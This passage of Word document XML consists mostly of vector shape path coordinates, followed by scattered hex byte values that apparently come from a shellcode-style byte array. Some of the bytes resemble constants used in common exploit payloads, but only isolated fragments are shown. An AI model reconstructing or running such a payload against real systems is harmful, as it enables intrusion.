12916,4893,12916,4896,12916,4898,12916,4900,12916,4902,12916,4904,12916,4907,12916,4909,12916,4911,12916,4914,12916,4916,12916,4919,12916,4921,12916,4924,12916,4927,12916,4929,12916,4932,12916,4935,12916,4938,12916,4941,12916,4943,12916,4946,12916,4946,12916,4946,12916,4946,12916,4946,12916,4946,12916,4946,12916,4946,12916,4946,12916,4946,12916,4946,12916,4946,12916,4946,12916,4946,12916,4946,12916,4946,12916,4946,12916,4946,12916,4946,12916,4946,12916,4946,12917,4946,12917,4946,12917,4946,12917,4946,12917,4946,12918,4946,12918,4946,12918,4946,12918,4946,12919,4946,12919,4946,12920,4946,12920,4946,12920,4946,12921,4946,12921,4946,12922,4946,12923,4946,12923,4946,12924,4946,12924,4946,12925,4946,12926,4946,12927,4946,12928,4946,12928,4946,12929,4946,12930,4946,12931,4946,12932,4946,12933,4946,12934,4946,12936,4946,12937,4946,12938,4946,12939,4946,12941,4946,12942,4946,12944,4946,12945,4946,12947,4946,12948,4946,12950,4946,12952,4946,12953,4946,12955,4946,12957,4946,12959,4946,12961,4946,12963,4946,12965,4946,12967,4946,12970,4946,12972,4946,12974,4946,12977,4946,12979,4946,12982,4946,12985,4946,12987,4946,12990,4946,12993,4946,12996,4946,12999,4946,13002,4946,13005,4946,13008,4946,13012,4946,13015,4946,13019,4946,13022,4946,13026,4946,13030,4946,13033,4946,13037,4946,13041,4946,13045,4946,13049,4946,13054,4946,13058,4946,13062,4946,13067,4946,13071,4946,13076,4946,13081,4946,13086,4946,13091,4946,13096,4946,13101,4946,13106,4946,13112,4946,13117,4946,13123,4946,13128,4946,13134,4946,13140,4946,13146,4946,13152,4946,13158,4946,13164,4946,13171,4946,13171,4946,13171,4946,13171,4946,13171,4946,13171,4946,13171,4946,13171,4946,13171,4946,13171,4946,13171,4946,13171,4946,13171,4946,13171,4946,13171,4946,13171,4946,13171,4946,13171,4946,13171,4946,13171,4946,13171,4946,13171,4946,13171,4946,13171,4946,13171,4946,13171,4945,13171,4945,13171,4945,13171,4945,13171,4945,13171,4945,13171,4944,13171,4944,13171,4944,13171,4944,13171,4943,13171,4943,13171,4943,13171,4943,13171,4942,13171,4942,13171,4942,13171,4941,13171,4941,13171,4940,13171,4940,13171,4940,13171,4939,13171,4939,13171,4938,13171,4938,13171,4937,13171,4936,13171,4936,13171,4935,13171,4935,13171,4934,13171,4933,13171,4933,13171,4932,13171,4931,13171,4930,13171,4930,13171,4929,13171,4928,13171,4927,13171,4926,13171,4925,13171,4924,13171,4923,13171,4922,13171,4921,13171,4920,13171,4919,13171,4918,13171,4916,13171,4915,13171,4914,13171,4913,13171,4911,13171,4910,13171,4909,13171,4907,13171,4906,13171,4904,13171,4903,13171,4901,13171,4900,13171,4898,13171,4896,13171,4895,13171,4893,13171,4891,13171,4889,13171,4887,13171,4885,13171,4883,13171,4881,13171,4879,13171,4877,13171,4875,13171,4873,13171,4871,13171,4869,13171,4866,13171,4864,13171,4862,13171,4859,13171,4857,13171,4854,13171,4852,13171,4849,13171,4846,13171,4844,13171,4841,13171,4838,13171,4835,13171,4832,13171,4829,13171,4826,13171,4826,13171,4826,13171,4826,13171,4826,13171,4826,13171,4826,13171,4826,13171,4826,13171,4826,13171,4826,13171,4826,13170,4826,13170,4826,13170,4826,13170,4826,13170,4826,13170,4826,13170,4826,13170,4826,13170,4826,13170,4826,13169,4826,13169,4826,13169,4826,13169,4826,13169,4826,13168,4826,13168,4826,13168,4826,13167,4826,13167,4826,13167,4826,13166,4826,13166,4826,13165,4826,13165,4826,13164,4826,13164,4826,13163,4826,13162,4826,13162,4826,13161,4826,13160,4826,13159,4826,13159,4826,13158,4826,13157,4826,13156,4826,13155,4826,13154,4826,13153,4826,13152,4826,13151,4826,13149,4826,13148,4826,13147,4826,13145,4826,13144,4826,13143,4826,13141,4826,13140,4826,13138,4826,13136,4826,13135,4826,13133,4826,13131,4826,13129,4826,13127,4826,13125,4826,13123,4826,13121,4826,13119,4826,13116,4826,13114,4826,13112,4826,13109,4826,13107,4826,13104,4826,13102,4826,13099,4826,13096,4826,13093,4826,13090,4826,13087,4826,13084,4826,13081,4826,13078,4826,13074,4826,13071,4826,13067,4826,13064,4826,13060,4826,13057,4826,13053,4826,13049,4826,13045,4826,13041,4826,13037,4826,13032,4826,13028,4826,13024,4826,13019,4826,13015,4826,13010,4826,13005,4826,13000,4826,12995,4826,12990,4826,12985,4826,12980,4826,12975,4826,12969,4826,12964,4826,12958,4826,12952,4826,12946,4826,12940,4826,12934,4826,12928,4826,12922,4826,12916e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:414.500pt;margin-top:644.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="8290,12890" coordsize="130,270">
        <v:shape style="position:absolute;left:8290;top:12890;width:130;height:270" coordorigin="8290,12890" coordsize="130,270" path="m8308,12916l8308,12916,8308,12916,8308,12916,8308,12916,8308,12916,8308,12916,8308,12916,8308,12916,8308,12916,8308,12916,8308,12916,8308,12916,8308,12916,8308,12916,8308,12916,8308,12916,8308,12916,8309,12916,8309,12916,8309,12916,8309,12916,8309,12916,8309,12916,8309,12916,8309,12916,8309,12916,8309,12916,8310,12916,8310,12916,8310,12916,8310,12916,8310,12916,8311,12916,8311,12916,8311,12916,8311,12916,8312,12916,8312,12916,8312,12916,8312,12916,8313,12916,8313,12916,8313,12916,8314,12916,8314,12916,8315,12916,8315,12916,8316,12916,8316,12916,8317,12916,8317,12916,8318,12916,8318,12916,8319,12916,8319,12916,8320,12916,8321,12916,8321,12916,8322,12916,8323,12916,8324,12916,8324,12916,8325,12916,8326,12916,8327,12916,8328,12916,8329,12916,8330,12916,8331,12916,8332,12916,8333,12916,8334,12916,8335,12916,8336,12916,8337,12916,8338,12916,8339,12916,8341,12916,8342,12916,8343,12916,8345,12916,8346,12916,8347,12916,8349,12916,8350,12916,8352,12916,8354,12916,8355,12916,8357,12916,8358,12916,8360,12916,8362,12916,8364,12916,8365,12916,8367,12916,8369,12916,8371,12916,8373,12916,8375,12916,8377,12916,8379,12916,8382,12916,8384,12916,8386,12916,8388,12916,8391,12916,8393,12916,8395,12916,8398,12916,8400,12916,8403,12916,8406,12916,8408,12916,8411,12916,8414,12916,8417,12916,8419,12916,8422,12916,8425,12916,8428,12916,8428,12916,8428,12916,8428,12916,8428,12916,8428,12916,8428,12916,8428,12916,8428,12916,8428,12916,8428,12916,8428,12916,8428,12916,8428,12916,8428,12916,8428,12916,8428,12916,8428,12916,8428,12916,8428,12916,8428,12917,8428,12917,8428,12917,8428,12917,8428,12917,8428,12918,8428,12918,8428,12918,8428,12918,8428,12919,8428,12919,8428,12920,8428,12920,8428,12920,8428,12921,8428,12921,8428,12922,8428,12923,8428,12923,8428,12924,8428,12924,8428,12925,8428,12926,8428,12927,8428,12928,8428,12928,8428,12929,8428,12930,8428,12931,8428,12932,8428,12933,8428,12934,8428,12936,8428,12937,8428,12938,8428,12939,8428,12941,8428,12942,8428,12944,8428,12945,8428,12947,8428,12948,8428,12950,8428,12952,8428,12953,8428,12955,8428,12957,8428,12959,8428,12961,8428,12963,8428,12965,8428,12967,8428,12970,8428,12972,8428,12974,8428,12977,8428,12979,8428,12982,8428,12985,8428,12987,8428,12990,8428,12993,8428,12996,8428,12999,8428,13002,8428,13005,8428,13008,8428,13012,8428,13015,8428,13019,8428,13022,8428,13026,8428,13030,8428,13033,8428,13037,8428,13041,8428,13045,8428,13049,8428,13054,8428,13058,8428,13062,8428,13067,8428,13071,8428,13076,8428,13081,8428,13086,8428,13091,8428,13096,8428,13101,8428,13106,8428,13112,8428,13117,8428,13123,8428,13128,8428,13134,8428,13140,8428,13146,8428,13152,8428,13158,8428,13164,8428,13171,8428,13171,8428,13171,8428,13171,8428,13171,8428,13171,8428,13171,8428,13171,8428,13171,8428,13171,8428,13171,8428,13171,8428,13171,8428,13171,8428,13171,8428,13171,8428,13171,8428,13171,8428,13171,8428,13171,8428,13171,8428,13171,8428,13171,8427,13171,8427,13171,8427,13171,8427,13171,8427,13171,8427,13171,8427,13171,8427,13171,8426,13171,8426,13171,8426,13171,8426,13171,8425,13171,8425,13171,8425,13171,8425,13171,8424,13171,8424,13171,8424,13171,8423,13171,8423,13171,8423,13171,8422,13171,8422,13171,8421,13171,8421,13171,8420,13171,8420,13171,8419,13171,8419,13171,8418,13171,8418,13171,8417,13171,8416,13171,8416,13171,8415,13171,8414,13171,8414,13171,8413,13171,8412,13171,8411,13171,8410,13171,8410,13171,8409,13171,8408,13171,8407,13171,8406,13171,8405,13171,8404,13171,8403,13171,8402,13171,8401,13171,8399,13171,8398,13171,8397,13171,8396,13171,8394,13171,8393,13171,8392,13171,8390,13171,8389,13171,8388,13171,8386,13171,8384,13171,8383,13171,8381,13171,8380,13171,8378,13171,8376,13171,8375,13171,8373,13171,8371,13171,8369,13171,8367,13171,8365,13171,8363,13171,8361,13171,8359,13171,8357,13171,8355,13171,8353,13171,8350,13171,8348,13171,8346,13171,8343,13171,8341,13171,8338,13171,8336,13171,8333,13171,8331,13171,8328,13171,8325,13171,8323,13171,8320,13171,8317,13171,8314,13171,8311,13171,8308,13171,8308,13171,8308,13171,8308,13171,8308,13171,8308,13171,8308,13171,8308,13171,8308,13171,8308,13171,8308,13171,8308,13170,8308,13170,8308,13170,8308,13170,8308,13170,8308,13170,8308,13170,8308,13170,8308,13170,8308,13170,8308,13169,8308,13169,8308,13169,8308,13169,8308,13169,8308,13168,8308,13168,8308,13168,8308,13167,8308,13167,8308,13167,8308,13166,8308,13166,8308,13165,8308,13165,8308,13164,8308,13164,8308,13163,8308,13162,8308,13162,8308,13161,8308,13160,8308,13159,8308,13159,8308,13158,8308,13157,8308,13156,8308,13155,8308,13154,8308,13153,8308,13152,8308,13151,8308,13149,8308,13148,8308,13147,8308,13145,8308,13144,8308,13143,8308,13141,8308,13140,8308,13138,8308,13136,8308,13135,8308,13133,8308,13131,8308,13129,8308,13127,8308,13125,8308,13123,8308,13121,8308,13119,8308,13116,8308,13114,8308,13112,8308,13109,8308,13107,8308,13104,8308,13102,8308,13099,8308,13096,8308,13093,8308,13090,8308,13087,8308,13084,8308,13081,8308,13078,8308,13074,8308,13071,8308,13067,8308,13064,8308,13060,8308,13057,8308,13053,8308,13049,8308,13045,8308,13041,8308,13037,8308,13032,8308,13028,8308,13024,8308,13019,8308,13015,8308,13010,8308,13005,8308,13000,8308,12995,8308,12990,8308,12985,8308,12980,8308,12975,8308,12969,8308,12964,8308,12958,8308,12952,8308,12946,8308,12940,8308,12934,8308,12928,8308,12922,8308,12916e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:109.500pt;margin-top:658.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2190,13170" coordsize="130,270">
        <v:shape style="position:absolute;left:2190;top:13170;width:130;height:270" coordorigin="2190,13170" coordsize="130,270" path="m2200,13186l2200,13186,2200,13186,2200,13186,2200,13186,2200,13186,2200,13186,2200,13186,2200,13186,2200,13186,2200,13186,2200,13186,2200,13186,2200,13186,2200,13186,2200,13186,2200,13186,2200,13186,2200,13186,2201,13186,2201,13186,2201,13186,2201,13186,2201,13186,2201,13186,2201,13186,2201,13186,2201,13186,2202,13186,2202,13186,2202,13186,2202,13186,2202,13186,2202,13186,2203,13186,2203,13186,2203,13186,2203,13186,2204,13186,2204,13186,2204,13186,2205,13186,2205,13186,2205,13186,2206,13186,2206,13186,2207,13186,2207,13186,2208,13186,2208,13186,2208,13186,2209,13186,2210,13186,2210,13186,2211,13186,2211,13186,2212,13186,2213,13186,2213,13186,2214,13186,2215,13186,2215,13186,2216,13186,2217,13186,2218,13186,2219,13186,2220,13186,2221,13186,2222,13186,2223,13186,2224,13186,2225,13186,2226,13186,2227,13186,2228,13186,2229,13186,2230,13186,2231,13186,2233,13186,2234,13186,2235,13186,2237,13186,2238,13186,2239,13186,2241,13186,2242,13186,2244,13186,2245,13186,2247,13186,2249,13186,2250,13186,2252,13186,2254,13186,2256,13186,2257,13186,2259,13186,2261,13186,2263,13186,2265,13186,2267,13186,2269,13186,2271,13186,2274,13186,2276,13186,2278,13186,2280,13186,2283,13186,2285,13186,2287,13186,2290,13186,2292,13186,2295,13186,2298,13186,2300,13186,2303,13186,2306,13186,2308,13186,2311,13186,2314,13186,2317,13186,2320,13186,2320,13186,2320,13186,2320,13186,2320,13186,2320,13186,2320,13186,2320,13186,2320,13186,2320,13186,2320,13186,2320,13186,2320,13186,2320,13186,2320,13186,2320,13186,2320,13186,2320,13186,2320,13186,2320,13187,2320,13187,2320,13187,2320,13187,2320,13187,2320,13187,2320,13188,2320,13188,2320,13188,2320,13189,2320,13189,2320,13189,2320,13190,2320,13190,2320,13191,2320,13191,2320,13192,2320,13192,2320,13193,2320,13193,2320,13194,2320,13195,2320,13195,2320,13196,2320,13197,2320,13198,2320,13199,2320,13199,2320,13200,2320,13201,2320,13202,2320,13203,2320,13205,2320,13206,2320,13207,2320,13208,2320,13209,2320,13211,2320,13212,2320,13214,2320,13215,2320,13217,2320,13218,2320,13220,2320,13222,2320,13223,2320,13225,2320,13227,2320,13229,2320,13231,2320,13233,2320,13235,2320,13238,2320,13240,2320,13242,2320,13245,2320,13247,2320,13250,2320,13252,2320,13255,2320,13257,2320,13260,2320,13263,2320,13266,2320,13269,2320,13272,2320,13275,2320,13279,2320,13282,2320,13285,2320,13289,2320,13292,2320,13296,2320,13300,2320,13304,2320,13307,2320,13311,2320,13315,2320,13320,2320,13324,2320,13328,2320,13333,2320,13337,2320,13342,2320,13346,2320,13351,2320,13356,2320,13361,2320,13366,2320,13371,2320,13376,2320,13382,2320,13387,2320,13393,2320,13398,2320,13404,2320,13410,2320,13416,2320,13422,2320,13428,2320,13434,2320,13441,2320,13441,2320,13441,2320,13441,2320,13441,2320,13441,2320,13441,2320,13441,2320,13441,2320,13441,2320,13441,2320,13441,2320,13441,2320,13441,2320,13441,2320,13441,2320,13441,2320,13441,2320,13441,2320,13441,2320,13441,2320,13441,2320,13441,2319,13441,2319,13441,2319,13441,2319,13441,2319,13441,2319,13441,2319,13441,2318,13441,2318,13441,2318,13441,2318,13441,2318,13441,2317,13441,2317,13441,2317,13441,2317,13441,2316,13441,2316,13441,2316,13441,2315,13441,2315,13441,2315,13441,2314,13441,2314,13441,2313,13441,2313,13441,2312,13441,2312,13441,2311,13441,2311,13441,2310,13441,2310,13441,2309,13441,2308,13441,2308,13441,2307,13441,2306,13441,2306,13441,2305,13441,2304,13441,2303,13441,2302,13441,2301,13441,2301,13441,2300,13441,2299,13441,2298,13441,2297,13441,2296,13441,2295,13441,2294,13441,2292,13441,2291,13441,2290,13441,2289,13441,2288,13441,2286,13441,2285,13441,2284,13441,2282,13441,2281,13441,2279,13441,2278,13441,2276,13441,2275,13441,2273,13441,2272,13441,2270,13441,2268,13441,2266,13441,2265,13441,2263,13441,2261,13441,2259,13441,2257,13441,2255,13441,2253,13441,2251,13441,2249,13441,2247,13441,2245,13441,2242,13441,2240,13441,2238,13441,2235,13441,2233,13441,2230,13441,2228,13441,2225,13441,2223,13441,2220,13441,2217,13441,2215,13441,2212,13441,2209,13441,2206,13441,2203,13441,2200,13441,2200,13441,2200,13441,2200,13441,2200,13441,2200,13441,2200,13441,2200,13441,2200,13441,2200,13441,2200,13441,2200,13441,2200,13441,2200,13441,2200,13440,2200,13440,2200,13440,2200,13440,2200,13440,2200,13440,2200,13440,2200,13440,2200,13439,2200,13439,2200,13439,2200,13439,2200,13438,2200,13438,2200,13438,2200,13437,2200,13437,2200,13437,2200,13436,2200,13436,2200,13435,2200,13435,2200,13434,2200,13434,2200,13433,2200,13432,2200,13432,2200,13431,2200,13430,2200,13430,2200,13429,2200,13428,2200,13427,2200,13426,2200,13425,2200,13424,2200,13423,2200,13422,2200,13421,2200,13419,2200,13418,2200,13417,2200,13416,2200,13414,2200,13413,2200,13411,2200,13410,2200,13408,2200,13406,2200,13405,2200,13403,2200,13401,2200,13399,2200,13397,2200,13395,2200,13393,2200,13391,2200,13389,2200,13387,2200,13384,2200,13382,2200,13379,2200,13377,2200,13374,2200,13372,2200,13369,2200,13366,2200,13363,2200,13360,2200,13357,2200,13354,2200,13351,2200,13348,2200,13344,2200,13341,2200,13338,2200,13334,2200,13330,2200,13327,2200,13323,2200,13319,2200,13315,2200,13311,2200,13307,2200,13303,2200,13298,2200,13294,2200,13289,2200,13285,2200,13280,2200,13275,2200,13270,2200,13266,2200,13260,2200,13255,2200,13250,2200,13245,2200,13239,2200,13234,2200,13228,2200,13222,2200,13216,2200,13211,2200,13204,2200,13198,2200,13192,2200,13186e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:186.500pt;margin-top:695.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3730,13910" coordsize="130,250">
        <v:shape style="position:absolute;left:3730;top:13910;width:130;height:250" coordorigin="3730,13910" coordsize="130,250" path="m3746,13921l3746,13921,3746,13921,3746,13921,3746,13921,3746,13921,3746,13921,3746,13921,3746,13921,3746,13921,3746,13921,3746,13921,3746,13921,3746,13921,3746,13921,3746,13921,3746,13921,3746,13921,3746,13921,3746,13921,3746,13921,3746,13921,3747,13921,3747,13921,3747,13921,3747,13921,3747,13921,3747,13921,3747,13921,3747,13921,3748,13921,3748,13921,3748,13921,3748,13921,3748,13921,3749,13921,3749,13921,3749,13921,3749,13921,3750,13921,3750,13921,3750,13921,3751,13921,3751,13921,3752,13921,3752,13921,3752,13921,3753,13921,3753,13921,3754,13921,3754,13921,3755,13921,3755,13921,3756,13921,3756,13921,3757,13921,3758,13921,3758,13921,3759,13921,3760,13921,3761,13921,3761,13921,3762,13921,3763,13921,3764,13921,3765,13921,3765,13921,3766,13921,3767,13921,3768,13921,3769,13921,3770,13921,3771,13921,3772,13921,3774,13921,3775,13921,3776,13921,3777,13921,3778,13921,3780,13921,3781,13921,3782,13921,3784,13921,3785,13921,3787,13921,3788,13921,3790,13921,3791,13921,3793,13921,3794,13921,3796,13921,3798,13921,3800,13921,3801,13921,3803,13921,3805,13921,3807,13921,3809,13921,3811,13921,3813,13921,3815,13921,3817,13921,3819,13921,3821,13921,3824,13921,3826,13921,3828,13921,3831,13921,3833,13921,3836,13921,3838,13921,3841,13921,3843,13921,3846,13921,3849,13921,3851,13921,3854,13921,3857,13921,3860,13921,3863,13921,3866,13921,3866,13921,3866,13921,3866,13921,3866,13921,3866,13921,3866,13921,3866,13921,3866,13921,3866,13921,3866,13921,3866,13921,3866,13921,3866,13921,3866,13921,3866,13921,3866,13922,3866,13922,3866,13922,3866,13922,3866,13922,3866,13922,3866,13922,3866,13923,3866,13923,3866,13923,3866,13923,3866,13924,3866,13924,3866,13924,3866,13925,3866,13925,3866,13926,3866,13926,3866,13926,3866,13927,3866,13928,3866,13928,3866,13929,3866,13929,3866,13930,3866,13931,3866,13931,3866,13932,3866,13933,3866,13934,3866,13935,3866,13936,3866,13937,3866,13938,3866,13939,3866,13940,3866,13941,3866,13942,3866,13944,3866,13945,3866,13946,3866,13948,3866,13949,3866,13951,3866,13952,3866,13954,3866,13955,3866,13957,3866,13959,3866,13961,3866,13963,3866,13965,3866,13967,3866,13969,3866,13971,3866,13973,3866,13975,3866,13978,3866,13980,3866,13982,3866,13985,3866,13987,3866,13990,3866,13993,3866,13996,3866,13999,3866,14001,3866,14004,3866,14008,3866,14011,3866,14014,3866,14017,3866,14021,3866,14024,3866,14028,3866,14031,3866,14035,3866,14039,3866,14043,3866,14047,3866,14051,3866,14055,3866,14059,3866,14064,3866,14068,3866,14072,3866,14077,3866,14082,3866,14086,3866,14091,3866,14096,3866,14101,3866,14106,3866,14112,3866,14117,3866,14123,3866,14128,3866,14134,3866,14139,3866,14145,3866,14151,3866,14157,3866,14163,3866,14170,3866,14176,3866,14176,3866,14176,3866,14176,3866,14176,3866,14176,3866,14176,3866,14176,3866,14176,3866,14176,3866,14176,3866,14176,3866,14176,3866,14176,3866,14176,3866,14176,3866,14176,3866,14176,3866,14176,3866,14176,3865,14176,3865,14176,3865,14176,3865,14176,3865,14176,3865,14176,3865,14176,3865,14176,3865,14176,3864,14176,3864,14176,3864,14176,3864,14176,3864,14176,3863,14176,3863,14176,3863,14176,3863,14176,3862,14176,3862,14176,3862,14176,3861,14176,3861,14176,3861,14176,3860,14176,3860,14176,3859,14176,3859,14176,3859,14176,3858,14176,3858,14176,3857,14176,3856,14176,3856,14176,3855,14176,3855,14176,3854,14176,3853,14176,3853,14176,3852,14176,3851,14176,3851,14176,3850,14176,3849,14176,3848,14176,3847,14176,3846,14176,3845,14176,3845,14176,3844,14176,3843,14176,3842,14176,3840,14176,3839,14176,3838,14176,3837,14176,3836,14176,3835,14176,3833,14176,3832,14176,3831,14176,3829,14176,3828,14176,3827,14176,3825,14176,3824,14176,3822,14176,3821,14176,3819,14176,3817,14176,3816,14176,3814,14176,3812,14176,3810,14176,3809,14176,3807,14176,3805,14176,3803,14176,3801,14176,3799,14176,3797,14176,3795,14176,3793,14176,3790,14176,3788,14176,3786,14176,3783,14176,3781,14176,3779,14176,3776,14176,3774,14176,3771,14176,3769,14176,3766,14176,3763,14176,3760,14176,3758,14176,3755,14176,3752,14176,3749,14176,3746,14176,3746,14176,3746,14176,3746,14176,3746,14176,3746,14176,3746,14176,3746,14176,3746,14176,3746,14176,3746,14176,3746,14176,3746,14176,3746,14176,3746,14176,3746,14176,3746,14176,3746,14176,3746,14175,3746,14175,3746,14175,3746,14175,3746,14175,3746,14175,3746,14174,3746,14174,3746,14174,3746,14173,3746,14173,3746,14173,3746,14172,3746,14172,3746,14172,3746,14171,3746,14171,3746,14170,3746,14170,3746,14169,3746,14168,3746,14168,3746,14167,3746,14166,3746,14166,3746,14165,3746,14164,3746,14163,3746,14162,3746,14161,3746,14160,3746,14159,3746,14158,3746,14157,3746,14156,3746,14155,3746,14154,3746,14152,3746,14151,3746,14150,3746,14148,3746,14147,3746,14145,3746,14143,3746,14142,3746,14140,3746,14138,3746,14136,3746,14135,3746,14133,3746,14131,3746,14129,3746,14126,3746,14124,3746,14122,3746,14120,3746,14117,3746,14115,3746,14112,3746,14110,3746,14107,3746,14104,3746,14101,3746,14099,3746,14096,3746,14093,3746,14090,3746,14086,3746,14083,3746,14080,3746,14076,3746,14073,3746,14069,3746,14066,3746,14062,3746,14058,3746,14054,3746,14050,3746,14046,3746,14042,3746,14038,3746,14034,3746,14029,3746,14025,3746,14020,3746,14015,3746,14011,3746,14006,3746,14001,3746,13996,3746,13991,3746,13985,3746,13980,3746,13975,3746,13969,3746,13963,3746,13958,3746,13952,3746,13946,3746,13940,3746,13934,3746,13927,3746,13921e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:198.500pt;margin-top:726.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3970,14530" coordsize="130,270">
        <v:shape style="position:absolute;left:3970;top:14530;width:130;height:270" coordorigin="3970,14530" coordsize="130,270" path="m3986,14551l3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3987,14551,3987,14551,3987,14551,3987,14551,3987,14551,3987,14551,3987,14551,3987,14551,3988,14551,3988,14551,3988,14551,3988,14551,3988,14551,3989,14551,3989,14551,3989,14551,3989,14551,3990,14551,3990,14551,3990,14551,3991,14551,3991,14551,3991,14551,3992,14551,3992,14551,3992,14551,3993,14551,3993,14551,3994,14551,3994,14551,3995,14551,3995,14551,3996,14551,3997,14551,3997,14551,3998,14551,3999,14551,3999,14551,4000,14551,4001,14551,4001,14551,4002,14551,4003,14551,4004,14551,4005,14551,4006,14551,4006,14551,4007,14551,4008,14551,4009,14551,4010,14551,4012,14551,4013,14551,4014,14551,4015,14551,4016,14551,4017,14551,4019,14551,4020,14551,4021,14551,4022,14551,4024,14551,4025,14551,4027,14551,4028,14551,4030,14551,4031,14551,4033,14551,4035,14551,4036,14551,4038,14551,4040,14551,4041,14551,4043,14551,4045,14551,4047,14551,4049,14551,4051,14551,4053,14551,4055,14551,4057,14551,4059,14551,4062,14551,4064,14551,4066,14551,4068,14551,4071,14551,4073,14551,4076,14551,4078,14551,4081,14551,4083,14551,4086,14551,4089,14551,4092,14551,4094,14551,4097,14551,4100,14551,4103,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14552,4106,14552,4106,14552,4106,14552,4106,14552,4106,14552,4106,14552,4106,14552,4106,14552,4106,14553,4106,14553,4106,14553,4106,14553,4106,14553,4106,14554,4106,14554,4106,14554,4106,14555,4106,14555,4106,14555,4106,14556,4106,14556,4106,14557,4106,14557,4106,14558,4106,14558,4106,14559,4106,14560,4106,14560,4106,14561,4106,14562,4106,14563,4106,14563,4106,14564,4106,14565,4106,14566,4106,14567,4106,14568,4106,14569,4106,14570,4106,14571,4106,14573,4106,14574,4106,14575,4106,14577,4106,14578,4106,14579,4106,14581,4106,14582,4106,14584,4106,14586,4106,14587,4106,14589,4106,14591,4106,14593,4106,14595,4106,14597,4106,14599,4106,14601,4106,14603,4106,14606,4106,14608,4106,14610,4106,14613,4106,14615,4106,14618,4106,14620,4106,14623,4106,14626,4106,14629,4106,14632,4106,14635,4106,14638,4106,14641,4106,14644,4106,14648,4106,14651,4106,14655,4106,14658,4106,14662,4106,14665,4106,14669,4106,14673,4106,14677,4106,14681,4106,14685,4106,14690,4106,14694,4106,14698,4106,14703,4106,14707,4106,14712,4106,14717,4106,14722,4106,14727,4106,14732,4106,14737,4106,14742,4106,14747,4106,14753,4106,14758,4106,14764,4106,14770,4106,14776,4106,14782,4106,14788,4106,14794,4106,14800,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4105,14806,4105,14806,4105,14806,4105,14806,4105,14806,4105,14806,4105,14806,4105,14806,4105,14806,4104,14806,4104,14806,4104,14806,4104,14806,4104,14806,4103,14806,4103,14806,4103,14806,4102,14806,4102,14806,4102,14806,4102,14806,4101,14806,4101,14806,4100,14806,4100,14806,4100,14806,4099,14806,4099,14806,4098,14806,4098,14806,4097,14806,4097,14806,4096,14806,4095,14806,4095,14806,4094,14806,4094,14806,4093,14806,4092,14806,4091,14806,4091,14806,4090,14806,4089,14806,4088,14806,4087,14806,4087,14806,4086,14806,4085,14806,4084,14806,4083,14806,4082,14806,4081,14806,4079,14806,4078,14806,4077,14806,4076,14806,4075,14806,4074,14806,4072,14806,4071,14806,4070,14806,4068,14806,4067,14806,4065,14806,4064,14806,4062,14806,4061,14806,4059,14806,4058,14806,4056,14806,4054,14806,4052,14806,4051,14806,4049,14806,4047,14806,4045,14806,4043,14806,4041,14806,4039,14806,4037,14806,4035,14806,4033,14806,4030,14806,4028,14806,4026,14806,4024,14806,4021,14806,4019,14806,4016,14806,4014,14806,4011,14806,4009,14806,4006,14806,4003,14806,4001,14806,3998,14806,3995,14806,3992,14806,3989,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14805,3986,14805,3986,14805,3986,14805,3986,14805,3986,14804,3986,14804,3986,14804,3986,14803,3986,14803,3986,14803,3986,14802,3986,14802,3986,14801,3986,14801,3986,14801,3986,14800,3986,14799,3986,14799,3986,14798,3986,14797,3986,14797,3986,14796,3986,14795,3986,14794,3986,14794,3986,14793,3986,14792,3986,14791,3986,14790,3986,14789,3986,14788,3986,14786,3986,14785,3986,14784,3986,14783,3986,14781,3986,14780,3986,14778,3986,14777,3986,14775,3986,14774,3986,14772,3986,14770,3986,14769,3986,14767,3986,14765,3986,14763,3986,14761,3986,14759,3986,14757,3986,14755,3986,14752,3986,14750,3986,14748,3986,14745,3986,14743,3986,14740,3986,14737,3986,14735,3986,14732,3986,14729,3986,14726,3986,14723,3986,14720,3986,14717,3986,14713,3986,14710,3986,14707,3986,14703,3986,14700,3986,14696,3986,14692,3986,14689,3986,14685,3986,14681,3986,14677,3986,14673,3986,14668,3986,14664,3986,14660,3986,14655,3986,14650,3986,14646,3986,14641,3986,14636,3986,14631,3986,14626,3986,14621,3986,14616,3986,14610,3986,14605,3986,14599,3986,14594,3986,14588,3986,14582,3986,14576,3986,14570,3986,14564,3986,14558,3986,1455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0x26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x68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0x6b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x0a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x89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0xea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xba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0x99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0x0a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xe5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0x93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0xec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0xe2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37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39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40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0xa4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x31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0xd9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xc8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0x83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0x0b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0x2f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0x30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xd5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44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0x4d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0x61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0xd5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x3c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0x01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0xc3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0x29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0x48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0x85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0xf6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0x75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x41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0xe7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0x58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0x6a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0x59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0x49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0xc7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0xc2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0xf0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0xb5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0xa2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0x56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0xff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3"/>
          <w:sz w:val="21"/>
